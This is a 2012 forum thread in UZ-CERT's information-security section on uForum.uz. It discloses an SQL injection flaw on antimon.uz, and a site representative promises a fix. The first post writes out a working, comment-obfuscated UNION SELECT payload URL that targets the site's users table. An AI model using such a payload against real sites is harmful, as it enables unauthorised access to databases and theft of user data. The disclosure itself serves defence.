Моё меню Общее меню Пользователи Правила форума Все прочитано
Вернуться   uForum.uz > GLOBAL > Информационная безопасность > UZ-CERT
Знаете ли Вы, что ...
...нарушения правил форума наказываются. Старайтесь их не нарушать.
<< Предыдущий совет - Случайный совет - Следующий совет >>

UZ-CERT Служба реагирования на компьютерные инциденты / Computer Emergency Response Team (cert.uz). Раздел UZINFOCOM


Ответить

 
Опции темы Опции просмотра
Старый 23.08.2012 22:28   #1  
Аватар для insider
Оффлайн
Engineer
Сообщений: 511
+ 45  169/112
– 0  12/9

Uzbekistan
Stop antimon.uz - SQL injection

Код:
http://antimon.uz/sitemap.php?LangID=uz/*!union*//*!select*/1,2,3,4,5,6,7,8,9 from users--
Возможно зная запрос и/или имена таблиц можно эффективно использовать уязвимость.
__________________
Мы не возьмём его в зоопарк. ... Неизвестный науке зверь !!! (с) Чебурашка
Ответить 
Старый 23.08.2012 23:12   #2  
Real ID Group
Аватар для Александр Баягин
Оффлайн
Sistematika IT
Python developer
AKA:BredoGen
Сообщений: 86
+ 10  36/20
– 0  1/1

UzbekistanОтправить сообщение для Александр Баягин с помощью Skype™
Все гораздо хуже оказывается.
Не знаю, как лучше связаться с владельцами сайта, вероятно по телефону. Кто-нибудь поднимите себе карму, сообщите им чтобы убрали все прямые инклуды (что фатальнее скуль инъекции) из кода, а то упрут весь код, базу напрямую и вообще всё возможное. Можно обойтись и без примеров.
А пока правят, лучше закрыть сайт от доступа.

Кто вообще такое пишет?
Ответить 
Старый 25.08.2012 12:59   #3  
Аватар для Umid Sam
Оффлайн
Сообщений: 3
+ 1  0/0
– 0  0/0

Uzbekistan
Спасибо вам за выявление уязвимости, постараемся в кратчайшие сроки устранить эти проблемы у нас на сайте antimon.uz

Последний раз редактировалось Umid Sam; 25.08.2012 в 13:02.
Ответить 
Ответить
Опции темы
Опции просмотра




Здесь представлены форумы: UZINFOCOM, ЦППМП, ГКСИТТ, PC.UZ, Microsoft, IBM, HP, Fujitsu, D-Link, Intel, Ассоциация IT, InfoCOM.UZ, BANK.UZ, ActiveCloud, Sarkor Telecom, BUZTON, Cisco Systems, NetDec, EVO, Sharq Telekom, EPSON, Cron Telecom.
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd. Перевод: zCarot
Advertisement System V2.5 By Branden
Центр UZINFOCOM


Новые 24 часа Кто на форуме Новички Поиск Кабинет Все прочитано Вверх